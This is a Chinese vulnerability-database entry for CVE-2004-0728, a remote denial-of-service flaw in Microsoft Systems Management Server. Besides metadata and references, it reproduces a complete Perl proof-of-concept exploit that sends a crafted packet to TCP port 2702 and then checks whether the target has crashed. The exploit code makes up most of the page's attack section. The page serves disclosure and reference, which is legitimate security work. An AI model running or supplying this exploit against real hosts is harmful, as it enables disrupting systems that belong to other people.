Microsoft Systems Management Server远程拒绝服务漏洞

Microsoft Systems Management Server远程拒绝服务漏洞

漏洞ID 1108079 漏洞类型 未知
发布时间 2004-07-24 更新时间 2004-07-27
图片[1]-Microsoft Systems Management Server远程拒绝服务漏洞-安全小百科CVE编号 CVE-2004-0728
图片[2]-Microsoft Systems Management Server远程拒绝服务漏洞-安全小百科CNNVD-ID CNNVD-200407-046
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/366
https://www.securityfocus.com/bid/90591
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200407-046
|漏洞详情
MicrosoftSystemsManagementServer是Windows系统配置管理解决方案。MicrosoftSystemsManagementServer在处理部分异常包通信时处理不正确,远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。SMS远程控制客户端服务监听TCP2701和2702,服务执行签名检查和对接收到的数据进行大小测试,如果构建一包通过基本检查,但可使服务读或写非法内存地址而发生异常,就可以对服务进行拒绝服务攻击。当服务使用带非法参数的API调用时可在multprot.dll库中发生异常。
|漏洞EXP
#!/usr/bin/perl

#############################
#
# SMS DOS proof of concept and test code
#
#############################

use Socket;
use IO::Socket;

if (@ARGV != 1)
{
print "usage: $0 <host or ip>n";
exit;
}

$host = shift(@ARGV);

$hexmsg = converthex("5243483016004000524348455858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858585858");

print "nCreating socket for connection to: $hostnn";

my $sock1 = IO::Socket::INET->new (PeerAddr => $host, PeerPort => "(2702)", Proto
=> "tcp") or die("Could not create socket: $!n");

$sock1->autoflush(1);

print $sock1 "$hexmsg";

while (<$sock1>)
{
print;
}

print "nPacket sent to $host (please wait) ...n";

sleep(2);

print "Verifying status of $host ...n";

sleep(2);

my $sock2 = IO::Socket::INET->new (PeerAddr => $host, PeerPort => '(2702)', Proto
=> 'tcp') or die("nDOS was successful - $host is down ...n");

print "nAttempt was not successful. $host is still alive and responding ...n";

close($sock1);
close($sock2);

#############################
# End main code, start subs
#############################

sub converthex
{
local ($l) = @_;
$l =~ s/([0-9a-f]{1,2})s*/sprintf("%c",hex($1))/egi;

return $l;
}

#############################
# End code
#############################

# milw0rm.com [2004-07-24]
|受影响的产品
Microsoft Systems Management Server 2.50.2726 .0
|参考资料

来源:XF
名称:sms-remote-service-dos(16696)
链接:http://xforce.iss.net/xforce/xfdb/16696
来源:BUGTRAQ
名称:20040714[HV-MED]DoSinMicrosoftSMSClient
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=108983763710315&w;=2

相关推荐: PHP-Nuke 6.0 – Multiple Full Path Disclosure Vulnerabilities

PHP-Nuke 6.0 – Multiple Full Path Disclosure Vulnerabilities 漏洞ID 1053660 漏洞类型 发布时间 2002-12-16 更新时间 2002-12-16 CVE编号 N/A CNNVD-ID …

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享